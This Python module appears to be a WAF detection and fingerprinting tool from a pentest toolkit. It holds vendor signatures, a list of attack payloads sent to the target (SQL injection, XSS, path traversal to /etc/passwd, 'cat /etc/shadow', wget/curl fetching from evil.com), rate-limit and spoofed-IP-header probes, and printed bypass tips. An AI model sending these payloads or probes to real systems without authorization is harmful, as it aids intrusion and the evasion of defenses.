"""
BYMA TOOLS - Advanced WAF Detection
Professional Web Application Firewall detection and fingerprinting
"""
import requests
import re
import json
from pathlib import Path
from datetime import datetime
from urllib.parse import urlparse
from core.colors import (
    print_success, print_error, print_warning, print_info,
    print_result, print_section, print_subsection, print_table,
    cprint, Colors, print_separator, Icons
)
from core.logger import get_database, get_logger


class WAFDetector:
    """Professional WAF detection and fingerprinting"""
    
    def __init__(self):
        self.logger = get_logger()
        self.db = get_database()
        self.start_time = None
        self.target_url = None
        self.waf_detected = []
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })
    
    # WAF signatures - headers, cookies, and response patterns
    WAF_SIGNATURES = {
        'Cloudflare': {
            'headers': {
                'cf-ray': r'.+',
                'cf-cache-status': r'.+',
                'expect-ct': r'.+',
            },
            'cookies': ['__cfduid', 'cf_clearance'],
            'body': [
                r'cloudflare',
                r'cf-browser-verification',
                r'cdn-cf',
                r'__cf',
            ],
            'status': [403, 503],
            'server': r'cloudflare',
        },
        'Akamai': {
            'headers': {
                'x-akamai-transformed': r'.+',
                'x-cache-key': r'.+',
                'x-ser': r'.+',
            },
            'cookies': ['akamai'],
            'body': [
                r'akamai',
                r'reference/\d+\.\d+',
                r'Access Denied',
                r'AkamaiGhost',
            ],
            'status': [403, 502],
            'server': r'akamai',
        },
        'Incapsula': {
            'headers': {
                'x-iinfo': r'.+',
                'x-cdn': r'.+',
            },
            'cookies': ['incap_ses', 'visid_incap', 'nlbi'],
            'body': [
                r'incapsula',
                r'imperva',
                r'incap_ses',
            ],
            'status': [403],
            'server': r'incapsula',
        },
        'Imperva': {
            'headers': {
                'x-iinfo': r'.+',
                'x-cdn': r'.+',
            },
            'cookies': ['imperva', 'incap_ses', 'visid_incap'],
            'body': [
                r'imperva',
                r'incapsula',
            ],
            'status': [403],
            'server': r'imperva',
        },
        'Sucuri': {
            'headers': {
                'x-sucuri-id': r'.+',
                'x-sucuri-cache': r'.+',
            },
            'cookies': ['sucuricloud'],
            'body': [
                r'sucuri',
                r'sucuri\.net',
                r'Access Denied',
                r'Sucuri WebSite Firewall',
            ],
            'status': [403],
            'server': r'sucuri',
        },
        'Wordfence': {
            'headers': {
                'x-wordfence': r'.+',
            },
            'cookies': ['wordfence', 'wf_loginalerted'],
            'body': [
                r'wordfence',
                r'Wordfence',
                r'Generated by Wordfence',
            ],
            'status': [403],
            'server': r'wordfence',
        },
        'ModSecurity': {
            'headers': {},
            'cookies': [],
            'body': [
                r'mod_security',
                r'modsecurity',
                r'NOYB',
                r'ModSecurity',
            ],
            'status': [403, 406],
            'server': r'mod_security',
        },
        'F5 BIG-IP ASM': {
            'headers': {
                'x-cnection': r'.+',
            },
            'cookies': ['BIGipServer', 'TS*'],
            'body': [
                r'BIGipServer',
                r'F5 Networks',
                r'the requested URL was rejected',
                r'F5 BigIP',
            ],
            'status': [403],
            'server': r'BigIP',
        },
        'Barracuda': {
            'headers': {},
            'cookies': ['barra_counter_session'],
            'body': [
                r'barracuda',
                r'Barracuda',
                r'Barracuda Web Application Firewall',
            ],
            'status': [403],
            'server': r'barracuda',
        },
        'Citrix NetScaler': {
            'headers': {
                'ns_af': r'.+',
                'via': r'.+NetScaler',
            },
            'cookies': ['ns_af', 'citrix_ns_id'],
            'body': [
                r'NetScaler',
                r'Citrix',
                r'ns_af',
            ],
            'status': [403],
            'server': r'NetScaler',
        },
        'FortiWeb': {
            'headers': {},
            'cookies': ['FORTIWAFSID', 'forti_waf'],
            'body': [
                r'FortiWeb',
                r'Fortinet',
                r'FGD',
            ],
            'status': [403],
            'server': r'FortiWeb',
        },
        'DenyAll': {
            'headers': {
                'x-denied': r'.+',
            },
            'cookies': ['dwt'],
            'body': [
                r'DenyAll',
                r'deny all',
                r'Condition Intercepted',
            ],
            'status': [403],
            'server': r'DenyAll',
        },
        'dotDefender': {
            'headers': {
                'x-dotdefender': r'.+',
            },
            'cookies': ['dotdefender'],
            'body': [
                r'dotDefender',
                r'Accellion',
            ],
            'status': [403],
            'server': r'dotDefender',
        },
        'Juniper': {
            'headers': {},
            'cookies': ['JSESSIONID'],
            'body': [
                r'Juniper',
                r'SRX',
                r'Junos',
            ],
            'status': [403],
            'server': r'Juniper',
        },
        'WatchGuard': {
            'headers': {},
            'cookies': [],
            'body': [
                r'WatchGuard',
                r'Fireware',
            ],
            'status': [403],
            'server': r'WatchGuard',
        },
        'QuickDefense': {
            'headers': {},
            'cookies': ['qos_token'],
            'body': [
                r'QuickDefense',
                r'Brocadigm',
            ],
            'status': [403],
            'server': r'QuickDefense',
        },
        'Reblaze': {
            'headers': {},
            'cookies': ['rbzid'],
            'body': [
                r'Reblaze',
                r'reblaze',
            ],
            'status': [403],
            'server': r'Reblaze',
        },
        'StackPath': {
            'headers': {
                'x-hw': r'.+',
            },
            'cookies': [],
            'body': [
                r'StackPath',
                r'Highwinds',
            ],
            'status': [403],
            'server': r'StackPath',
        },
        'Varnish': {
            'headers': {
                'via': r'.*varnish.*',
                'x-varnish': r'.+',
            },
            'cookies': [],
            'body': [
                r'Varnish',
            ],
            'status': [503],
            'server': r'Varnish',
        },
        'Nginx': {
            'headers': {},
            'cookies': [],
            'body': [],
            'status': [],
            'server': r'nginx',
        },
        'Apache': {
            'headers': {},
            'cookies': [],
            'body': [],
            'status': [],
            'server': r'apache',
        },
        'Microsoft IIS': {
            'headers': {},
            'cookies': [],
            'body': [],
            'status': [],
            'server': r'IIS',
        },
    }
    
    # Attack payloads to trigger WAF
    ATTACK_PAYLOADS = {
        'sql_injection': [
            "' OR '1'='1",
            "' UNION SELECT * FROM users--",
            "1; DROP TABLE users",
            "' AND 1=1--",
            "admin'--",
        ],
        'xss': [
            '<script>alert(1)</script>',
            '<img src=x onerror=alert(1)>',
            '<svg onload=alert(1)>',
            '"><script>alert(1)</script>',
        ],
        'path_traversal': [
            '../../../etc/passwd',
            '..\\..\\..\\windows\\system32\\config\\sam',
            '....//....//....//etc/passwd',
            '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',
        ],
        'command_injection': [
            '| ls -la',
            '; cat /etc/passwd',
            '$(ls -la)',
            '`ls -la`',
        ],
        'rce': [
            'ls /etc/passwd',
            'cat /etc/shadow',
            'wget http://evil.com/malware.sh',
            'curl http://evil.com/malware.sh',
        ],
    }
    
    def scan(self, url, output=None):
        """Main WAF detection scan"""
        self.start_time = datetime.now()
        self.target_url = url
        
        print_section("WAF DETECTION")
        print()
        
        # Create scan record
        scan_id = self.db.create_scan("waf_detect", url, "recon")
        self.logger.scan_start("waf_detect", url)
        
        try:
            print(f"  {Icons.TARGET} {Colors.BCYAN}Target:{Colors.BWHITE}       {url}")
            print_separator("-", 50)
            print()
            
            # Check normal response
            print_subsection("Normal Request Analysis")
            normal_response = self._get_response(url)
            
            if not normal_response:
                print_error("Could not reach target")
                self.db.update_scan(scan_id, "failed")
                return None
            
            self._analyze_response(normal_response)
            
            # Check various attack vectors
            print_subsection("Attack Vector Testing")
            
            for attack_type, payloads in self.ATTACK_PAYLOADS.items():
                print_info(f"Testing {attack_type.replace('_', ' ').title()}...")
                self._test_attack_vectors(url, attack_type, payloads)
            
            # Check HTTP methods
            print_subsection("HTTP Method Testing")
            self._test_http_methods(url)
            
            # Check rate limiting
            print_subsection("Rate Limiting Test")
            self._test_rate_limiting(url)
            
            # Check IP blocking
            print_subsection("IP Blocking Test")
            self._test_ip_headers(url)
            
            # Display results
            self._display_results()
            
            # Save to database
            self._save_to_database(scan_id)
            
            # Update scan status
            self.db.update_scan(scan_id, "completed", len(self.waf_detected))
            self.logger.scan_complete("waf_detect", url, len(self.waf_detected))
            
            # Save to file if requested
            if output:
                self._save_results(output)
            
            return self.waf_detected
        
        except Exception as e:
            self.db.update_scan(scan_id, "failed")
            self.logger.scan_error("waf_detect", url, str(e))
            print_error(f"Scan failed: {e}")
            return []
    
    def _get_response(self, url, headers=None):
        """Get HTTP response"""
        try:
            response = self.session.get(
                url,
                headers=headers or {},
                timeout=10,
                verify=False,
                allow_redirects=False
            )
            return response
        except Exception as e:
            return None
    
    def _analyze_response(self, response):
        """Analyze response for WAF signatures"""
        found_wafs = []
        
        # Check headers
        for waf_name, signatures in self.WAF_SIGNATURES.items():
            header_match = False
            
            for header_pattern, value_pattern in signatures.get('headers', {}).items():
                for response_header, response_value in response.headers.items():
                    if header_pattern.lower() == response_header.lower():
                        if re.search(value_pattern, response_value, re.IGNORECASE):
                            header_match = True
                            break
            
            # Check cookies
            cookie_match = False
            for cookie_name in signatures.get('cookies', []):
                for cookie in response.cookies:
                    if cookie_name.lower() in cookie.name.lower():
                        cookie_match = True
                        break
            
            # Check body
            body_match = False
            for body_pattern in signatures.get('body', []):
                if re.search(body_pattern, response.text, re.IGNORECASE):
                    body_match = True
                    break
            
            # Check server header
            server_match = False
            server = response.headers.get('Server', '')
            if signatures.get('server'):
                if re.search(signatures['server'], server, re.IGNORECASE):
                    server_match = True
            
            # Check status code
            status_match = False
            if response.status_code in signatures.get('status', []):
                status_match = True
            
            # If multiple indicators match, likely WAF
            matches = sum([header_match, cookie_match, body_match, server_match, status_match])
            
            if matches >= 2:
                found_wafs.append({
                    'name': waf_name,
                    'confidence': min(matches * 20, 100),
                    'indicators': {
                        'headers': header_match,
                        'cookies': cookie_match,
                        'body': body_match,
                        'server': server_match,
                        'status': status_match,
                    }
                })
        
        # Display found WAFs
        if found_wafs:
            for waf in found_wafs:
                confidence_color = Colors.BGREEN if waf['confidence'] >= 80 else Colors.BYELLOW
                print_success(f"Detected: {waf['name']} (Confidence: {confidence_color}{waf['confidence']}%{Colors.RESET})")
                self.waf_detected.append(waf)
        else:
            print_warning("No WAF detected from normal request")
        
        print()
    
    def _test_attack_vectors(self, url, attack_type, payloads):
        """Test attack vectors to trigger WAF"""
        blocked = 0
        
        for payload in payloads:
            try:
                # Add payload to URL
                test_url = f"{url}?test={payload}"
                response = self.session.get(test_url, timeout=10, verify=False)
                
                # Check if blocked
                if response.status_code in [403, 406, 429, 503]:
                    blocked += 1
                    
                    # Check for WAF signatures in block page
                    for waf_name, signatures in self.WAF_SIGNATURES.items():
                        for body_pattern in signatures.get('body', []):
                            if re.search(body_pattern, response.text, re.IGNORECASE):
                                if not any(w['name'] == waf_name for w in self.waf_detected):
                                    print_success(f"  {waf_name} blocked {attack_type}")
                                    self.waf_detected.append({
                                        'name': waf_name,
                                        'confidence': 60,
                                        'indicators': {'attack_block': True}
                                    })
                                break
            except:
                pass
        
        if blocked > 0:
            print_info(f"  {blocked}/{len(payloads)} payloads blocked")
        else:
            print_info(f"  No payloads blocked")
        
        print()
    
    def _test_http_methods(self, url):
        """Test HTTP methods"""
        methods = ['GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS', 'HEAD']
        
        for method in methods:
            try:
                response = self.session.request(
                    method,
                    url,
                    timeout=5,
                    verify=False,
                    allow_redirects=False
                )
                
                if response.status_code == 405:
                    print_warning(f"  {method}: Method Not Allowed")
                elif response.status_code == 403:
                    print_warning(f"  {method}: Forbidden")
                else:
                    print_success(f"  {method}: {response.status_code}")
            except:
                print_error(f"  {method}: Failed")
        
        print()
    
    def _test_rate_limiting(self, url):
        """Test rate limiting"""
        print_info("Sending 10 rapid requests...")
        
        responses = []
        for i in range(10):
            try:
                response = self.session.get(url, timeout=5, verify=False)
                responses.append(response.status_code)
            except:
                responses.append(0)
        
        # Check for rate limiting
        if 429 in responses:
            print_warning("Rate limiting detected (HTTP 429)")
            self.waf_detected.append({
                'name': 'Rate Limiter',
                'confidence': 90,
                'indicators': {'rate_limit': True}
            })
        elif responses.count(403) > 5:
            print_warning("Possible rate limiting (multiple 403s)")
        else:
            print_success("No rate limiting detected")
        
        print()
    
    def _test_ip_headers(self, url):
        """Test IP-based headers"""
        headers_to_test = [
            {'X-Forwarded-For': '1.2.3.4'},
            {'X-Real-IP': '1.2.3.4'},
            {'X-Originating-IP': '1.2.3.4'},
            {'Client-IP': '1.2.3.4'},
            {'X-Client-IP': '1.2.3.4'},
        ]
        
        for headers in headers_to_test:
            try:
                response = self.session.get(url, headers=headers, timeout=5, verify=False)
                
                if response.status_code == 403:
                    print_warning(f"  {list(headers.keys())[0]}: Blocked")
                else:
                    print_success(f"  {list(headers.keys())[0]}: Allowed")
            except:
                print_error(f"  {list(headers.keys())[0]}: Error")
        
        print()
    
    def _display_results(self):
        """Display scan results"""
        print_section("WAF DETECTION RESULTS")
        
        elapsed = (datetime.now() - self.start_time).total_seconds()
        
        # Summary
        print(f"\n  {Icons.INFO} {Colors.BCYAN}SCAN SUMMARY{Colors.RESET}")
        print_separator("-", 50)
        
        print(f"  {Icons.INFO} {Colors.BCYAN}Target:{Colors.BWHITE}       {self.target_url}")
        print(f"  {Icons.INFO} {Colors.BCYAN}WAFs Found:{Colors.BWHITE}    {len(self.waf_detected)}")
        print(f"  {Icons.INFO} {Colors.BCYAN}Time:{Colors.BWHITE}         {elapsed:.1f}s")
        
        print_separator("-", 50)
        print()
        
        # Display detected WAFs
        if self.waf_detected:
            print(f"\n  {Icons.INFO} {Colors.BGREEN}DETECTED WEB APPLICATION FIREWALLS{Colors.RESET}")
            print_separator("-", 50)
            
            for i, waf in enumerate(self.waf_detected, 1):
                confidence_color = Colors.BGREEN if waf['confidence'] >= 80 else Colors.BYELLOW
                
                print(f"  {Colors.BCYAN}#{i}:{Colors.BWHITE} {waf['name']}")
                print(f"     {Colors.BCYAN}Confidence:{Colors.BWHITE} {confidence_color}{waf['confidence']}%")
                
                # Show indicators
                indicators = waf.get('indicators', {})
                active_indicators = [k for k, v in indicators.items() if v]
                if active_indicators:
                    print(f"     {Colors.BCYAN}Indicators:{Colors.BWHITE} {', '.join(active_indicators)}")
                print()
        else:
            print_success("No WAF detected")
        
        # Recommendations
        if self.waf_detected:
            print_subsection("Bypass Techniques")
            print_info("Note: These are for authorized testing only!")
            print()
            
            for waf in self.waf_detected:
                waf_name = waf['name'].lower()
                
                if 'cloudflare' in waf_name:
                    print_info("Cloudflare bypass techniques:")
                    print_info("  - Use different IP addresses")
                    print_info("  - Rotate User-Agent strings")
                    print_info("  - Use HTTP/2")
                    print_info("  - Try origin IP direct access")
                
                elif 'akamai' in waf_name:
                    print_info("Akamai bypass techniques:")
                    print_info("  - Use valid cookies")
                    print_info("  - Match browser fingerprint")
                    print_info("  - Use correct Host header")
                
                elif 'incapsula' in waf_name or 'imperva' in waf_name:
                    print_info("Imperva/Incapsula bypass techniques:")
                    print_info("  - Complete JavaScript challenge")
                    print_info("  - Use valid session cookies")
                    print_info("  - Mimic real browser behavior")
                
                elif 'sucuri' in waf_name:
                    print_info("Sucuri bypass techniques:")
                    print_info("  - Find origin IP")
                    print_info("  - Use direct IP access")
                    print_info("  - Bypass via DNS history")
                
                elif 'modsecurity' in waf_name:
                    print_info("ModSecurity bypass techniques:")
                    print_info("  - Use encoding tricks")
                    print_info("  - Split payloads")
                    print_info("  - Use HTTP parameter pollution")
                
                print()
        
        print()
    
    def _save_to_database(self, scan_id):
        """Save results to database"""
        try:
            with self.db._cursor() as cursor:
                for waf in self.waf_detected:
                    cursor.execute("""
                        INSERT INTO scan_results 
                        (scan_id, result_type, result_data)
                        VALUES (?, ?, ?)
                    """, (
                        scan_id,
                        'waf_detected',
                        json.dumps(waf)
                    ))
        except Exception as e:
            print_warning(f"Could not save to database: {e}")
    
    def _save_results(self, output_file):
        """Save results to JSON file"""
        try:
            output_path = Path(output_file)
            output_path.parent.mkdir(parents=True, exist_ok=True)
            
            results = {
                'target': self.target_url,
                'scan_time': self.start_time.isoformat(),
                'waf_detected': self.waf_detected,
            }
            
            with open(output_path, 'w') as f:
                json.dump(results, f, indent=2)
            
            print_success(f"Results saved to {output_file}")
        except Exception as e:
            print_error(f"Failed to save results: {e}")
